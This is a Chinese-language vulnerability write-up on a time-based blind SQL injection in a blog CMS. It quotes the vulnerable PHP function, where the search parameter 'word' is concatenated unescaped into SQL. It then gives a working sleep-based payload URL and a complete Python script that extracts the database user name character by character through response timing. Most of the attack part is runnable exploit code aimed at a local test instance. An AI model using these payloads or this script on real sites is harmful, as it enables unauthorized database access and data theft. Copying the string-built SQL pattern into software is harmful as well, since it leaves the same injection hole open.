青云客博客cms某处盲注

作者：unhonker

延时注入，写代码受网速影响比较严重，网速不稳的话，可能误差比较大，当然，你可以适当把sleep数字搞大些，freebuf上面有一个转换成二进制，然后再开8个线程跑数据的思路，这里我就不写了。

在include/class_temp.php中

function articlelist($mark='',$ispage=true,$pagebtn=2,$auto=true,$bcat=0,$scat='',$lcat='',$size=0,$star=0,$word='',$order='',$searfie='title'){        global $web,$tcz;        if($mark=='special'){            if(!$size)$size=$web['list_size'];            $sql='select * from '.tabname('special_list').' where webid='.$web['id'].' and isdel=0 and special_id='.$tcz['id'].' order by dataid desc';            $spelist=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);            $list=array();            $web['list_record']=$spelist['num'];            $web['list_page']=$spelist['page'];            foreach($spelist['list'] as $spe){                $tname='article';                if($spe['modtype']>10)$tname.='_'.$web['id'].'_'.$spe['modtype'];                $art=db_getshow($tname,'*','webid='.$web['id'].' and isok=0 and dataid='.$spe['dataid']);                array_push($list,$art);                }            return $list;            }        $order_text='xu desc,sort desc,time_add desc,dataid desc';        if($order!='')$order_text=$order;        $tname='article';        $modtype=db_getone('module','modtype','webid='.$web['id'].goif($bcat,' and classid='.$bcat).goif($mark!='',' and mark="'.$mark.'"'));        if($modtype>10)$tname.='_'.$web['id'].'_'.$modtype;        $searsql='';        $seartype='title';        if($web['list_page']!='')$ispage=false;        if($ispage){            if($word=='')$word=$tcz['word'];            if($word!=''){                switch($tcz['seartype']){                    case 'date':                        $t1=strtotime($word.' 00:00:00');                        $t2=strtotime($word.' 23:59:59');                        if(empty($t1)){                            tipmsg('非法的搜索关键词：'.$word,true);                            }                        $searsql=' and time_add>='.$t1.' and time_add<='.$t2;                    break;                    default:                        if($tcz['seartype']!=''){                            if(strstr(','.$searfie.',',','.$tcz['seartype'].','))$seartype=$tcz['seartype'];                            }                        if(strstr($word,',')){                            $wlist=explode(',',$word);                            foreach($wlist as $w)$searsql.=goif($searsql!='',' or ').'LOCATE("'.$w.'",`'.$seartype.'`)>0';                            $searsql=' and ('.$searsql.')';                        }else $searsql=' and LOCATE("'.$word.'",`'.$seartype.'`)>0';                    break;                    }                }            if(!$size)$size=$web['list_size'];            if(!$bcat&&$tcz['bcat']&&$mark==''&&$auto)$bcat=$tcz['bcat'];            if($scat==''&&$tcz['scat']&&$auto)$scat=$tcz['scat'];            if($lcat==''&&$tcz['lcat']&&$auto)$lcat=$tcz['lcat'];            $sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($searsql!='',$searsql).' order by '.$order_text;            $list=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);            $web['list_record']=$list['num'];            $web['list_page']=$list['page'];            return $list['list'];        }else{            $sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($word!='',' and LOCATE("'.$word.'",`'.$seartype.'`)>0').' order by '.$order_text;            $list=db_getlist($sql,$size);            return $list;            }        }

其中变量$word过滤不得当，导致可以注入，测试了好多语句，最后别人给出的payload是延时注入，发现可以

漏洞验证：

http://127.0.0.1/?log=blog&seartype=title&word=%E9%9C%87%E6%92%BC%22%20and%20geometrycollection((select%20*from(select%20*%20from%20(select%20sleep%20(5))a)b))%20and%20%221%22=%221 

效果页面延时5秒

写了个脚本：

#/usr/bin/python #*-*coding=utf-8*-* import requests import time    session = requests.Session() payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789#$%^&*()-+=!@_.' def httpGet(url):        global session     try:          #print url         timestart = time.time()         session.get(url)         times = time.time() - timestart         #print times     except Exception ,e:         return 'timeout'     return times def getLength(url):#获取长度     i = 0     temp = url     while True:         urls = temp         urls = urls + '" and geometrycollection((select *from(select * from (select sleep (case when (select length(user())='+str(i)+') then 5 else 0.1 end))a)b)) and "1"="1'         htmlContent = httpGet(urls)         print 'i-->' + str(i)         if htmlContent > 5:                       print '长度为' + str(i)             return i             break         i += 1 def getUser(url,length):     data = ''     temp = url     for i in range(1,length):         for payload in payloads:             urls = temp + '" and geometrycollection((select *from(select * from (select sleep ( ascii(mid(user()from( '+str(i)+' )for(1)))='+str(ord(payload))+' ))a)b)) and "1"="1'             #print urls             htmlContent = httpGet(urls)             print "猜解中......."             if htmlContent > 3:                 print payload                 data += payload                 break     return data          if __name__ == '__main__':     length = getLength('http://127.0.0.1/?log=blog&seartype=title&word=qq')     getUser('http://127.0.0.1/?log=blog&seartype=title&word=qq',length)